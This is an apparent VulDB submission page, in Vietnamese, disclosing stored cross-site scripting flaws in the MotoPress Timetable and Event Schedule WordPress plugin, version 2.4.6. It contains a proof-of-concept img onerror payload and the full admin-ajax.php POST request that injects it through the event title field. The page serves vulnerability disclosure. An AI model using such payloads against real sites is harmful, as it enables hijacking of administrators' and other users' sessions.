Gửi #43712: Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Timetable and Event Schedule by MotoPress thông tin

tiêu đề	Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Timetable and Event Schedule by MotoPress
Mô tả	# Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in Timetable and Event Schedule by MotoPress # Exploit Author: Mostafa Farzaneh (Mr.pyweb) # Web Site: https://motopress.com/ # Software Homepage: https://wordpress.org/plugins/mp-timetable/ # Version : 2.4.6 # Tested on: Windows 10 # Category: WebApp # Date: 2022-05-24 # Description: MotoPress Timetable and Event Schedule is an all-around organizer plugin developed to help you create and manage online schedules for a single or multiple events, customize the appearance of each event, add date, time, description and display all the needed items in a carefully-crafted timetable. An authenticated user is able to inject arbitrary Javascript or HTML code to the "Timetable page" on Title's parameter This causes Stored XSS attack against the administrators or the other authenticated users. POC: 1- go to Timetable page 2- click on Quick Edit and change Title's value to "<img src=x onerror=alert`2`>" and click on update 3- click on view to run XSS payload Request: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wp/wp-admin/edit.php?post_type=mp-event Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 432 Origin: http://127.0.0.1 Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin post_title=%3Cimg+src%3Dx+onerror%3Dalert%603%60%3E&post_name=17&mm=05&jj=23&aa=2022&hh=18&mn=18&ss=01&post_author=1&post_password=&tax_input%5Bmp-event_category%5D%5B%5D=0&tax_input%5Bmp-event_category%5D%5B%5D=13&menu_order=0&tax_input%5Bmp-event_tag%5D=&comment_status=open&_status=publish&_inline_edit=f68c320526&post_view=list&screen=edit-mp-event&action=inline-save&post_type=mp-event&post_ID=17&edit_date=true&post_status=all
Người dùng	pyweb-security (UID 11883)
Đệ trình	15/08/2022 11:58 (cách đây 4 những năm)
Kiểm duyệt	16/08/2022 15:42 (1 day later)
Trạng thái	được chấp nhận
Mục VulDB	206486 [MotoPress Timetable and Event Schedule trên WordPress Quick Edit /wp-admin/admin-ajax.php post_title Tập lệnh chéo trang]
điểm	17

◂ Trước Tổng Quan Tiếp theo ▸

Interested in the pricing of exploits?

See the underground prices here!